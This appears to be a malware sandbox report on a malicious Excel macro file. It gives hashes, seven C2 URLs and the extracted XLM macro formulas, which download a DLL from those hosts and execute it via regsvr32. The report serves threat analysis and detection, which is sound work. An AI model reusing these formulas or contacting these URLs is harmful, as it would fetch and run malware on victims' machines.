Overview

overview

10

Static

static

10

4ac3cfd7ad...1.xlsm

windows7-x64

10

4ac3cfd7ad...1.xlsm

windows10-2004-x64

1

Sharing

Copy URL Twitter E-mail

General

  • Target

    4ac3cfd7ad8cf62e160f55053626f2a2a1cf14ca1045220bb88e38d8e7771001.zip

  • Size

    43KB

  • MD5

    4024d681047d43a1fe48450d660fb96a

  • SHA1

    5264f47c307def5197aab658064799bb11bc1079

  • SHA256

    f95f678699ce53f1410be50ca230681ac333f9eb45fa6ff5600c56ded85e41f2

  • SHA512

    7c3f207c7470856170c47b163298714a129c8a431ec91b28874854959fdcc0cec1d5b153ae53ff20e12f02e34c6bf498bd2653cdd1b697ab4a361777716666fb

  • SSDEEP

    768:4x34hEa7zRhYJA/qeFi5GqH7/Bnyga1ZqOkXzVaunvsAKujINKooPE:O47zQJsqeFi5HH7Znyga1w1ZaBAKujK1

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.arkpp.com/ARIS-BSU/9K1/

http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/

http://www.babylinesl.com/catalog/iVsl6YvlyIyX/

https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/

https://unada.us/acme-challenge/3NXwcYNCa/

https://automobile-facile.fr/wp-admin/QV/

https://alebit.de/css/gqKtdKmTsC4iDh/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arkpp.com/ARIS-BSU/9K1/","..\fbd.dll",0,0) =IF('EGVEB'!D9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.avrworks.com/mail/0Z4GbaKuDTGprJ/","..\fbd.dll",0,0)) =IF('EGVEB'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.babylinesl.com/catalog/iVsl6YvlyIyX/","..\fbd.dll",0,0)) =IF('EGVEB'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://physioacademy.co.uk/blog/Qs8QZTp0Z6nKf9YjVBMS/","..\fbd.dll",0,0)) =IF('EGVEB'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://unada.us/acme-challenge/3NXwcYNCa/","..\fbd.dll",0,0)) =IF('EGVEB'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://automobile-facile.fr/wp-admin/QV/","..\fbd.dll",0,0)) =IF('EGVEB'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alebit.de/css/gqKtdKmTsC4iDh/","..\fbd.dll",0,0)) =IF('EGVEB'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\fbd.dll") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • 4ac3cfd7ad8cf62e160f55053626f2a2a1cf14ca1045220bb88e38d8e7771001.zip
    .zip

    Password: infected

  • 4ac3cfd7ad8cf62e160f55053626f2a2a1cf14ca1045220bb88e38d8e7771001.xlsm
    .xlsm office2007